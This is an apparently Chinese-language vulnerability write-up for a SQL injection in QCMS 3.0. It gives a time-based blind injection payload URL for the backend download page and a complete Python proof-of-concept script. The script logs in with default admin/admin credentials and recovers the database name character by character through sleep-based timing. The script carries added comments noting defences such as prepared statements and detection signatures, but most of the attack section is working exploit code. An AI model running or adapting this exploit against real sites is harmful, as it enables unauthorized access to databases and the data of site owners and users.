QCMS 3.0 SQL 注入漏洞
一、漏洞简介
二、漏洞影响
QCMS 3.0
三、复现过程
在后台下载管理处
构造payload
http://www.0-sec.org/backend/down.html?title=1';select if(ascii(substr((select database()), 1, 1))-113, 1, sleep(5));%23
这里直接附上简单脚本
# !/usr/bin/python3
# -*- coding:utf-8 -*-
# author: Forthrglory
import requests
def getCookie():
    """Log in to the QCMS backend and return the session cookies as a dict.

    Posts the hard-coded default credentials ``admin``/``admin`` to
    ``/admin.php`` and returns the cookies from that one response.  The
    probes in ``getDatabase`` are sent with these cookies, i.e. as an
    authenticated backend user, so this login is a precondition of the PoC.
    From a defender's view: non-default admin credentials remove that
    precondition, and the login request is the first event to correlate
    with the burst of probe traffic that follows it.
    """
    url = 'http://127.0.0.1/admin.php'
    data = {
        'username':'admin',
        'password':'admin'
    }
    session = requests.session()
    res = session.post(url, data)
    # Only the cookie jar of the login response is kept; the Session object
    # itself is discarded, so no further requests reuse it.
    return requests.utils.dict_from_cookiejar(res.cookies)
def getDatabase(url, arr, cookies):
    """Recover the current database name character by character through
    time-based blind SQL injection on the ``title`` query parameter.

    Args:
        url: the backend endpoint being probed (``/backend/down.html``).
        arr: candidate characters tried at every position.
        cookies: backend session cookies as returned by ``getCookie``.

    For positions 1..10 every candidate ``j`` is sent as
    ``title=1';select if(ascii(substr((select database()), i, 1))-ord(j),
    1, sleep(5));#``.  The subtraction is zero (false) only when the
    character matches, so a match is the branch that runs ``sleep(5)``;
    the script infers the character purely from response time, nothing is
    read from the response body.  Prints progress and returns ``None``.

    NOTE(review), defender's reading of the payload shape:
    * The closing quote followed by ``;select`` implies that ``title`` is
      concatenated into the SQL text and that the driver apparently
      executes stacked statements.  A bound parameter (prepared statement)
      and a driver without multi-statement execution each close this.
    * Detection: up to ``10 * len(arr)`` GETs to this endpoint within a
      short window, each carrying ``select``/``substr``/``sleep`` in
      ``title``, with a small fraction of responses taking >= 5 s.
    """
    str = ''              # shadows the builtin; accumulates the recovered name
    requests.session()    # return value unused; probes below use requests.get
    for i in range(1, 11):
        for j in arr:
            # '%%23' renders as '%23', the URL-encoded '#' that comments out
            # the remainder of the original statement.
            data = url + '?title=1\';select if(ascii(substr((select database()), %s, 1))-%s, 1, sleep(5));%%23' % (i, ord(j))
            # print(data)
            res = requests.get(url=data, cookies=cookies)
            # print(res.elapsed.total_seconds())
            # Any response slower than 5 s is taken as a confirmed match for
            # this position; the remaining candidates are then skipped.
            if(res.elapsed.total_seconds() > 5):
                str += j
                print(str)
                break
    print('database=' + str)
if __name__ == '__main__':
    # Endpoint from the write-up above (backend download management), pointed
    # at the local host in this PoC.
    url = 'http://127.0.0.1/backend/down.html'
    # Candidate alphabet: chr(48) '0' through chr(122) 'z' -- digits, upper
    # and lower case letters, and the ASCII punctuation lying between them.
    arr = []
    for i in range(48, 123):
        arr.append(chr(i))
    # Authenticate first; the cookie dict is echoed so a failed login is
    # visible before the timing probes start.
    cookies = getCookie()
    print(cookies)
    getDatabase(url, arr, cookies)